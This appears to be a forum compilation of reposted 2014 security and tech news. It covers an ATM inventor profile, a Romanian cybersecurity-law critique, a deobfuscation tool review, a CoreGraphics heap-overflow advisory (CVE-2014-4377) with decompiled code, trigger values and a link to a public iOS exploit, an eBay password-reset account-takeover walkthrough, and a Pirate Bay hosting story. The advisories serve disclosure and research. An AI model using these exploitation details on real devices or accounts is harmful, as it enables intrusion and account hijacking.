[Image caption: The plaque at the site of the first ATM goes unnoticed by many]

Mr Shepherd-Barron says he and his wife realised the importance of his invention only when they visited Chiang Mai in northern Thailand. They watched a farmer arriving on a bullock cart, who removed his wide-brimmed hat to use the cash machine. "It was the first evidence to me that we'd changed the world," he says.

But even though he invented the machine, Mr Shepherd-Barron believes its use in future will be very different. He predicts that our society will no longer be using cash within a few years. "Money costs money to transport. I am therefore predicting the demise of cash within three to five years." He believes fervently that we will soon be swiping our mobile phones at till points, even for small transactions.
At 82, Mr Shepherd-Barron is very much alive to new ideas and inventions - even though his device that plays killer whale noises still needs a little bit of tinkering. Sursa: BBC NEWS | Business | The man who invented the cash machine
-
The cybersecurity law is back on fast forward
23/09/14 14:27:00, by bogdan, 809 words

Surely you didn't think that, after the decision on pre-paid cards, our dear elected officials and the institutions pushing cyber-securitism understood that legal texts should be seriously debated – especially those that infringe on fundamental liberties?

The draft law on Romania's cybersecurity was never debated in the Chamber of Deputies; it passed by tacit adoption on 17 September. As soon as it was sent to the Senate, a deadline of 2 (two) days (i.e., tomorrow) was set for the report of the Defense Committee (i.e., the committee ruling on the merits), even though the bill is NOT officially under urgent procedure. Naturally, the human rights committee was not even asked for an opinion.

As I have already told you, this draft law is much worse than the pre-paid one, which is a trifle by comparison. Let me remind you of the most interesting proposals:

- All companies (the SRI says "users" does not include natural persons; I say it does – but let's not get lost in details) must "allow access to data" to these authorities (SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO and ANCOM). Access is granted upon a simple "motivated request". Pay close attention – this is not about handing over computer data you hold that could help an investigation, but about "access to data", in case I was being too subtle about the difference.
- All companies that own a laptop, smartphone or any other device must adopt cybersecurity policies, and must identify and implement adequate technical and organizational measures to efficiently manage security risks. That means at least 1,500 euros per company invested in security. (You will see what nice things you have to write in your cybersecurity policies...)
- While the EU asks that the institutions active in the field of cybersecurity be "civilian bodies, operating fully under democratic control, which should not carry out activities in the field of intelligence", we present the SRI as the most democratic, civilian and citizen-friendly of institutions. Technical competence it may have, but it is not under democratic control. Nor is it familiar with terms such as public debate, access to public information or decisional transparency.

But I tell you – don't get too worked up! The Senate has no time to debate anyway, and the "18 victims per second" of the Internet (n.b. – that comes to 1.5 million victims a day) need the SRI to protect them. Even if they don't want it. Likewise, the observations and amendments submitted are not even taken into consideration, because it is hard to judge with your own mind. If the SRI tells us something, then it must certainly be so. And human rights arguments or Constitutional Court (CCR) decisions are not enough for anyone – Romania is not a democracy anyway.

The CCR ruled that access to traffic data must be subject to the control of a judge, but it will surely decide otherwise if the accessed data can also include content data (i.e., more than traffic data):

"Requests for access to the retained data with a view to using them for the purpose provided by law, made by state bodies with responsibilities in the field of national security, are not subject to the authorization or approval of a court of law, thus lacking the guarantee of effective protection of the stored data against the risks of abuse as well as against any illicit access to and use of these data. This circumstance is of a nature to constitute an interference with the fundamental rights to intimate, family and private life and to the secrecy of correspondence and, therefore, contravenes the constitutional provisions which enshrine and protect these rights."

I have said enough. For a fuller picture, also read Dan Tapalaga's article, "The Country of Democracy with Epaulettes". And one of the authors on Contributors dryly sums up the details of the situation better than I could have described them:

"There are also bad laws in Romania, with unconstitutional provisions, adopted by parliamentarians overzealous in building good-neighborly relations with other state institutions, as well as state institutions overzealous in criticizing the Constitutional Court for censoring Parliament's excesses of deliberate stupidity. All of this under the cover of a charade about outstanding, yet selective, results in the fight against corruption (lately even in an actively negative sense), as well as under the cover of the by-now omnipresent external threat, especially the cyber threat and especially from the Middle East. It would be laughable if it were not sad, because before it was cautious blue it was imagined pink, especially before the friendly Russian spring delicately showed its snowdrops in Odessa. In a word, everything is fine in Romania, the country is safe and will be well protected, cyber-wise, against actions of internal subversion carried out by force, such as the unconstitutional parliamentary putsch of the summer of 2012 – a maximum of pink stability under the umbrella of the alliance that is bound to defend Romania. Sometimes even from itself, right? And still, in Romania, absolutely nobody has any problem whatsoever."

Good night!

Sursa: Legea securitatii cibernetice revine pe fast forward
Author: Bogdan MANOLEA
-
Javascript Deobfuscation Tools Redux

Posted on September 23, 2014 by darryl

Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today's obfuscated scripts with the least amount of intervention.

Here are the tools I'll be testing:

Automated
- JSUnpack
- Javascript Deobfuscator (Firefox Add-On)
- SpiderMonkey

Semi-Automated/Manual
- JSDetox
- Javascript Debugger (all are similar; using Script Debugger for this test): Microsoft Script Debugger, Chrome Developer Tools, Firefox Developer Tools, Firebug (Firefox Add-On)
- Revelo

Here are the obfuscated scripts:

- Sample 1: Dean Edwards Packer
- Sample 2: HiveLogic Enkoder
- Sample 3: For this sample, I used the same original HTML code as the above and obfuscated it using three online obfuscators in the following order: obfuscatorjavascript.com, www.gaijin.at/en/olsjse.php, www.atasoyweb.net/Javascript_Encrypter/javascript_encrypter_eng.php
- Sample 4: Speed-Trap JS
- Sample 5: Gong Da EK
- Sample 6: RIG EK
- Sample 7: Angler EK
- Sample 8: Nuclear EK

Prelude

My plan is simple: use the tools to try to deobfuscate the above scripts without spending more than a few minutes on each one. If I can't figure one out by making obvious tweaks along the way, I move on. To be honest, I'm no expert with all of these tools, so I'm not taking full advantage of their capabilities, but this should give you some idea of what you can expect. I would encourage you to play along (the scripts are here). Be sure you do this in a virtual machine because many of the scripts are real and very malicious.

JSUnpack

JSUnpack is fully automated and can deal with a lot of scripts except the complex ones.

Javascript Deobfuscator

This Firefox add-on is quite robust and also completely automated. Interestingly, it is able to deobfuscate the hard ones but trips up on an easy one.
This tool won't be able to handle scripts that target Internet Explorer, for obvious reasons. You might be able to comment out some browser-sniffing routines, though.

SpiderMonkey

The SpiderMonkey tool would be similar to using the Rhino or V8 engines, but Didier Stevens adds some mods that have beefed up SpiderMonkey's capabilities. DOM-based scripts tend to pose a problem for these engines, but you can make several tweaks to the script and define objects to get around this.

JSDetox

This tool has a lot of capability and potential. The main reason it can't deob the malicious scripts is probably because I suck at using it.

Javascript Debugger

Pretty much all of the Javascript debuggers work the same way, so I just lumped them together as a single class of tools. Using a debugger can be slow because you have to follow along with the script and know where to place breakpoints, but it is often the most effective way of deobfuscating scripts.

Revelo

I would have hoped my own tool would do pretty well against these scripts, and it did. The main challenge with using Revelo is that you need to understand the script you are working on and be able to recognize entry and exit points to inspect. This tool is definitely not for everyone, but it has the capability to do just as well as a debugger.

Conclusion and Scorecard

As I mentioned earlier, I'm probably not making the most of every tool as they are quite capable and powerful in their own right. The end result is probably more of a reflection of my abilities rather than the tools, so take this with a barrel of salt.

Sursa: Javascript Deobfuscation Tools Redux | Kahu Security
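Much of what these tools automate boils down to undoing layers of simple string encodings. As a toy illustration (not tied to any of the samples above), here is a sketch that reverses JavaScript `unescape()`-style %XX escaping, one of the most common layers found in obfuscated droppers:

```python
import re

def unescape_js(s: str) -> str:
    """Decode JavaScript unescape()-style %XX hex escape sequences."""
    return re.sub(r"%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), s)

# "%61%6C%65%72%74%28%31%29" is the escaped form of alert(1)
print(unescape_js("%61%6C%65%72%74%28%31%29"))  # alert(1)
```

Real samples stack several such layers (often ending in an `eval`), which is exactly where the automated tools save time and the manual ones give control.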
-
CoreGraphics Memory Corruption - CVE-2014-4377

Apple's CoreGraphics library fails to validate the input when parsing the colorspace specification of a PDF XObject, resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input in any application linked with the affected framework. Using a crafted PDF file as an HTML image, combined with an information leakage vulnerability, this issue leads to arbitrary code execution. A complete, 100% reliable and portable exploit for MobileSafari on iOS 7.1.x can be downloaded from github.

Summary

- Title: Apple CoreGraphics Memory Corruption
- CVE Name: CVE-2014-4377
- Permalink: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377
- Date published: 2014-09-18
- Date of last update: 2014-09-19
- Class: Client side / Integer Overflow / Memory Corruption
- Advisory: HT6441 HT6443

Vulnerability Details

Safari accepts PDF files as a native image format for the <img> HTML tag. Thus, browsing an HTML page in Safari can transparently load multiple PDF files without any further user interaction. CoreGraphics is responsible for parsing the PDF files.

The Apple CoreGraphics framework fails to validate the input when parsing the colorspace specification of a PDF XObject. A small heap memory allocation can be overflowed with controlled data from the input, enabling arbitrary code execution in the context of MobileSafari (a memory layout information leak is needed).

The CoreGraphics framework is a C-based API that is based on the Quartz advanced drawing engine. It provides low-level, lightweight 2D rendering. It is used in a wide range of applications to handle path-based drawing, transformations, color management, offscreen rendering, patterns, gradients and shadings, image data management, image creation, masking, and PDF document creation, display, and parsing.
The CoreGraphics library implements the functionality to load and save several graphic formats such as PDF, and it is used by most common applications that deal with images, including Safari, Preview, Skype, etc.

The 32-bit version of the framework also implements the x_alloc heap, a set of low-level procedures to manage an internal heap memory structure used when processing images of different types (including PDF files). The functions x_calloc and x_free are used very frequently to allocate and de-allocate memory fast.

The x_calloc function behaves as a normal calloc except that it allocates a bit of extra memory for metadata. It actually allocates an extra 2*sizeof(void*) bytes and pads the resulting size to the next 16-byte border. When the chunk is in use (allocated), this extra space is used to hold the size of the chunk, thus making it very fast to free. On the other hand, when the chunk is free, the metadata space is used to form a free-list: the first metadata value in a free chunk points to the next free chunk. This is its pseudocode (think of x_mem_alloc0_size as a plain malloc):

void* __cdecl x_calloc(size_t nmemb, size_t size)
{
    void *buffer = x_mem_alloc0_size((nmemb * size + 31) & -16);
    *(size_t *)buffer = (nmemb * size + 31) & -16;
    return buffer + 16;
}

This function is prone to integer overflow because it doesn't check that (nmemb * size) is less than MAXUINT-16. So if a programmer tries to allocate a size in the range [-16,-1], x_calloc will allocate 0 (zero) or 16 bytes (instead of the immense value required) without triggering any exception.

An x_calloc bug

There is an x_calloc-related bug in how PDF handles the colorspace for embedded XObjects. Forms and images of different types can be embedded in a PDF file using an XObject pdf stream. As described in the pdf specification, an XObject can specify the colorspace in which the intended image is described.
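The wraparound in x_calloc's size computation is easy to reproduce in isolation. Here is a small sketch that emulates the 32-bit arithmetic of `(nmemb * size + 31) & -16` from the pseudocode (this models the computation described in the advisory, not Apple's actual code):

```python
MASK32 = 0xFFFFFFFF  # emulate 32-bit unsigned wraparound

def x_calloc_rounded_size(nmemb: int, size: int) -> int:
    """Emulate ((nmemb * size + 31) & -16) as computed in 32-bit math."""
    return ((nmemb * size + 31) & MASK32) & ~0xF & MASK32

# A sane request: 100 bytes plus metadata, padded to a 16-byte border.
print(x_calloc_rounded_size(1, 100))          # 128
# A request in the [-16, -1] range, e.g. -10 as 0xFFFFFFF6: the addition
# of 31 wraps past 2**32, yielding a tiny allocation with no error.
print(x_calloc_rounded_size(1, 0xFFFFFFF6))   # 16
```

This is the whole bug in miniature: the caller believes it asked for an enormous buffer, while the allocator silently hands back 16 bytes.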
The CoreGraphics library fails to validate the input when parsing the /Indexed colorspace definition of an XObject pdf stream, and enables an attacker to reach x_calloc with a size in the [-16,-1] range. The indexed colorspace definition is table based and relies on a base colorspace. For example, the following definition defines an indexed colorspace of 200 colors based on an RGB base colorspace with the table defined in the indirect object 8 0 R. For more info on indexed colorspaces see section 8.6.6.3 of the pdf specification.

/ColorSpace [/indexed /DeviceRGB 200 8 0 R]

The following is an excerpt of the function _cg_build_colorspace. It was taken from the dyld_shared_cache_armv7 of the iPhone3,1 (iPhone4) iOS version 7.1.1. The function can be disassembled at address 0x2D59F260, considering that the dyld_shared_cache is loaded at 0x2C000000.

/* cs_index_array should represent something like this:
   [/indexed /DeviceRGB 200 8 0 R] */

/* Sanity check, array must have 4 elements */
if ( CGPDFArrayGetCount(cs_index_array) != 4 )
{
    message = "invalid `Indexed' color space: incorrect number of entries in color space array.";
    goto EXIT;
}

/* Sanity check, 2nd element should be an object */
if ( !CGPDFArrayGetObject(cs_index_array, 1, &base_cs_obj) )
{
    message = "invalid `Indexed' color space: second color space array entry is not an object.";
    goto EXIT;
}

/* build the base colorspace */
base_cs = cg_build_colorspace(base_cs_obj);
if ( !base_cs )
{
    message = "invalid `Indexed' color space: invalid base color space.";
    goto EXIT;
}

/* get the 3rd element. N, the number of indexed colors in the table */
if ( CGPDFArrayGetInteger(cs_index_array, 2, &N) )
{
    message = "invalid `Indexed' color space: high value entry is not an integer.";
    goto RELEASE_EXIT;
}

/* Sanity check. N should be positive */
if ( N <= -1 )
{
    message = "invalid `Indexed' color space: high value entry is negative.";
    goto RELEASE_EXIT;
}

/* cs is the resultant colorspace, init to NULL */
cs = 0;

/* if 4th element is a pdf stream get it and do stuff ... */
if ( CGPDFArrayGetStream(cs_index_array, 3, &lookup_stream) == 1 )
{
    lookup_buffer = CGPDFStreamCopyData(lookup_stream);
    if ( lookup_buffer )
    {
        lookup_size = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs);
        if ( CFDataGetLength(lookup_buffer) >= lookup_size )
        {
            data = CFDataGetBytePtr(lookup_buffer);
            cs = CGColorSpaceCreateIndexed(base_cs, N_, data);
        }
        else
        {
            /* HERE is the interesting bit. A lookup_size in the [-16,-1]
               range will silently allocate a very small buffer */
            overflow_buffer = x_calloc_2D5143B4(1, lookup_size);
            _data = CFDataGetBytePtr(lookup_buffer);
            _size = CFDataGetLength(lookup_buffer);
            /* But memmove will copy all the available data in the stream.
               OVERFLOW!! */
            memmove(overflow_buffer, _data, _size);
            /* CGColorSpaceCreateIndexed is a nop when N is greater than 256 */
            cs = CGColorSpaceCreateIndexed(base_cs, N_, overflow_buffer);
            if ( overflow_buffer )
                x_free(overflow_buffer);
        }
        CFRelease(lookup_buffer);
    }
    goto RELEASEANDEXIT;
}

/* else if 4th element is a pdf string get it and do stuff ... */
if ( CGPDFArrayGetString(cs_index_array, 3, &lookup_str) == 1 )
{
    lookup_size_ = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs);
    if ( lookup_size_ != CGPDFStringGetLength(lookup_str) )
    {
        message = "invalid `Indexed' color space: invalid lookup entry.";
        goto RELEASEANDEXIT;
    }
    buffer = CGPDFStringGetBytePtr(lookup_str);
    cs = CGColorSpaceCreateIndexed(base_cs, N__, buffer);
    goto RELEASEANDEXIT;
}

/* at this point cs is NULL */
message = "invalid `Indexed' color space: lookup entry is not a stream or a string.";

RELEASE_EXIT:
    CGColorSpaceRelease(base_cs);
EXIT:
    log_2D5A0DA8(message);
/* result in cs */

CGPDFArrayGetInteger gets an object from an arbitrary position in a pdf array, starting at 0.
The number of indexed colors is read from the third array position (index 2), multiplied by the number of color components of the base colorspace, and the result is then (in the pdf stream case) passed to x_calloc as the allocation size. We basically control the size passed to x_calloc. If the resulting value is, for instance, -10, x_calloc will allocate a small amount of memory and return a valid pointer. If the base colorspace is /DeviceRGB with 3 color components, passing a value of 0x55555555 will do the trick. Then the memmove will potentially overflow the small buffer with an arbitrary number of arbitrary bytes. The call to CGColorSpaceCreateIndexed can be considered a no-op, as it will use this buffer only if our controlled size is a positive value no greater than 0xff, which is not the interesting case.

Exploitation

A 100% reliable PoC exploit can be downloaded from the GitHub project. The exploit needs a companion information-leak vulnerability to bypass the ASLR, DEP and code-signing iOS exploit mitigations. It is presented as a CGI script that expects the dyld_shared_cache address, the shellcode address and the iOS version as GET parameters, and it executes arbitrary code in the context of MobileSafari.

Exploit: https://github.com/feliam/CVE-2014-4377
Blog post: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377
Info: iOS 7_1 exploit for CVE-2014-4377 flaw publicly available | Security Affairs
-
Today I am going to share an interesting finding that allowed me to change the password of almost "150 million" eBay users!

I was checking my e-mail when I found a "View your recent activity" message from PayPal. I checked the links inside the message and found an "Open Redirection" vulnerability! I decided to report it to PayPal, and when I asked a friend of mine about PayPal's security e-mail, he told me that I should register on eBay to report vulnerabilities to PayPal. Well, I went to eBay to register and found two other vulnerabilities while registering! I reported the three bugs and waited.

Two days later, I tried to log in to my eBay account to check the status of my 3 reports and, like every time, I had forgotten my password. So I went to the "Forgot Password" page on eBay to see how secure their password reset mechanism is. Here is how users can change their own passwords on eBay:

1- The user navigates to the "Forgot Password" page and enters his registered e-mail or username.
2- eBay offers three options for changing the password (via e-mail, text message or phone call).
3- If you choose the e-mail method, they send you an e-mail that includes a reset-password link where you can change your own password.

So let's fire up Burp Suite to see what happens behind the scenes. Visiting (https://fyp.ebay.com/EnterUserInfo?&clientapptype=19) and entering my e-mail address took me to another page asking where I want to get my "Reset Password" link. I chose "By E-mail" and intercepted the request:

[Screenshot: Hijacking eBay users]

After forwarding that request, I received an e-mail with a change-password link. I clicked on the link, and it took me to another page where I had to create my new password. I entered my new password, hit enter and intercepted the request, which looked like:

[Screenshot: Hijacking eBay users]

Have you noticed that??!!
Wow! Instead of using the secret "reqinput" value that was sent to the user's e-mail, eBay uses the same "reqinput" value that was generated in the first request!!!

Exploitation time: I went again to the "Forgot Password" page, entered the victim's e-mail, chose to send the "Reset Password" link by e-mail, captured the request and saved the "reqinput" value. Then I repeated the POST request "shown in the last screenshot" and replaced the reqinput value with the new one. I posted it, but it gave me an error!! Why? Because the user has to click on the link sent to his e-mail so the server can unlock the change-password process, "and this is the only user interaction that has to be taken in order to make the attack succeed". After the user clicked on the "reset password" link, I was able to change his password.

This means that an attacker can hijack millions of user accounts in a targeted attack. Here is a real-life attack scenario diagram:

[Diagram: eBay hacked]

Enjoy watching the PoC video.

Sursa: Yasser Ali's Blog » How I could change your eBay password
-
Breaking the Sandbox

Author: Sudeep Singh

Introduction

In this paper, I would like to discuss various existing and interesting techniques that are used to evade the detection of a virus in a sandbox. We will also look at ways a sandbox can be hardened to prevent such evasion techniques.

This paper is targeted towards those who have experience with Windows OS internals and reverse engineering viruses, as well as those who are interested in developing detection mechanisms for viruses in a sandboxed environment. A deep understanding of the evasion techniques used by viruses in the wild helps us implement better detection mechanisms.

Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/34591.pdf
-
[h=1]The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoid Detection[/h]
Tuesday, September 23, 2014 Mohit Kumar

The Pirate Bay is the world's largest torrent tracker site; it handles requests from millions of users every day and is among the top 100 most visited websites on the Internet. The Pirate Bay is famous for potentially hosting illegal content on its website, and despite years of persecution it continues to disobey copyright laws worldwide. Even though both founders of The Pirate Bay (TPB) file-exchange service were arrested by the authorities and are in prison, their notorious pirated-content exchange continues to receive millions of unique visitors daily. That's really strange!! But how??

Recently, The Pirate Bay team revealed how cloud technology made its service's virtual servers truly secure against police raids and detection. It doesn't own any physical servers; The Pirate Bay runs on "virtual machines" at a few commercial cloud hosting services that don't even know whom they are dealing with.

According to a TorrentFreak report, The Pirate Bay currently has 21 virtual machines (VMs) hosted around the globe at different cloud providers. The cloud technology eliminates the need for any crucial pieces of hardware, which saves cost, guarantees better uptime, makes the site more portable, and therefore makes the torrent site harder to take down.

The Pirate Bay operates on 182 GB of RAM and 94 GPU cores, with a total storage capacity of 620 GB, which is actually not used in full. Of the 21 VMs, eight serve web pages, six are dedicated to handling searches, two run the site's database, and the remaining five are used for load balancing, statistics, the proxy site on port 80, torrent storage and the controller.
Interestingly, the commercial cloud hosting providers have no idea that The Pirate Bay is using their services, because all traffic goes through the load balancer, which masks the activities of the other virtual machines from the cloud providers. This means that none of the cloud hosting providers' IP addresses are publicly linked to The Pirate Bay, which should keep them safe.

If the police shut down some of these cloud servers, it is always possible to move the VMs to another location in a relatively short time. Back in 2006 in Sweden, police raided The Pirate Bay's hosting company, seizing everything from blank CDs to fax machines and servers and taking down the site, but it took just three days for it to return to its normal state.

Sursa: The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoids Detection